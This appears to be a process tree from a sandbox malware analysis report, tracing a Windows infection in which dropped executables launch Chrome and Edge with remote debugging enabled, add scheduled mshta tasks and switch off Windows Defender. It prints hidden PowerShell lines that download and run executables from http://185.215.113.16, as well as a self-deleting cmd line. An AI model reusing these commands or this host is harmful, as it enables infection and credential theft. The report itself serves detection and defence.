C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2652 /prefetch:85⤵PID:3968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:15⤵
- Uses browser remote debugging
PID:1660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3380 /prefetch:15⤵
- Uses browser remote debugging
PID:2252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:85⤵PID:1432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:15⤵
- Uses browser remote debugging
PID:488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:85⤵PID:4916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4232 /prefetch:85⤵PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4904,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:85⤵PID:4468
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4984 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa210146f8,0x7ffa21014708,0x7ffa210147185⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:25⤵PID:1112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:85⤵PID:2064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:15⤵
- Uses browser remote debugging
PID:3024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:15⤵
- Uses browser remote debugging
PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:15⤵
- Uses browser remote debugging
PID:3688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:15⤵
- Uses browser remote debugging
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\d2dbi" & exit4⤵
- System Location Discovery: System Language Discovery
PID:5916 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5000
-
-
C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4072 -
C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090673001\e521e66b6b.exe"C:\Users\Admin\AppData\Local\Temp\1090673001\e521e66b6b.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- System Location Discovery: System Language Discovery
PID:6700
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:408 -
C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3336
-
-
C:\Users\Admin\AppData\Local\Temp\1091274101\36c0490467.exe"C:\Users\Admin\AppData\Local\Temp\1091274101\36c0490467.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn JmLyfmaJCXv /tr "mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:5364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn JmLyfmaJCXv /tr "mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5440
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5372 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5516 -
C:\Users\Admin\AppData\Local\TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE"C:\Users\Admin\AppData\Local\TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:5864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:5916 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5896
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "ukW5wmaliqZ" /tr "mshta \"C:\Temp\uLU5RZ6Si.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2612
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\uLU5RZ6Si.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5160 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3884
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091314001\9222c12528.exe"C:\Users\Admin\AppData\Local\Temp\1091314001\9222c12528.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5432
-
-
C:\Users\Admin\AppData\Local\Temp\1091315001\e984a62c31.exe"C:\Users\Admin\AppData\Local\Temp\1091315001\e984a62c31.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3480 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:6072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa2100cc40,0x7ffa2100cc4c,0x7ffa2100cc585⤵PID:5976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2044 /prefetch:25⤵PID:1456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1724,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2564 /prefetch:35⤵PID:2084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2072,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2516 /prefetch:85⤵PID:4320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:15⤵
- Uses browser remote debugging
PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3388 /prefetch:15⤵
- Uses browser remote debugging
PID:5320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4496 /prefetch:85⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4640 /prefetch:15⤵
- Uses browser remote debugging
PID:1668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:85⤵PID:1732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:85⤵PID:5832
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:548 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa210146f8,0x7ffa21014708,0x7ffa210147185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:25⤵PID:6436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:35⤵PID:6448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:85⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:15⤵
- Uses browser remote debugging
PID:6608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:15⤵
- Uses browser remote debugging
PID:6632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:15⤵
- Uses browser remote debugging
PID:1848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:15⤵
- Uses browser remote debugging
PID:4928
-
-
-
-
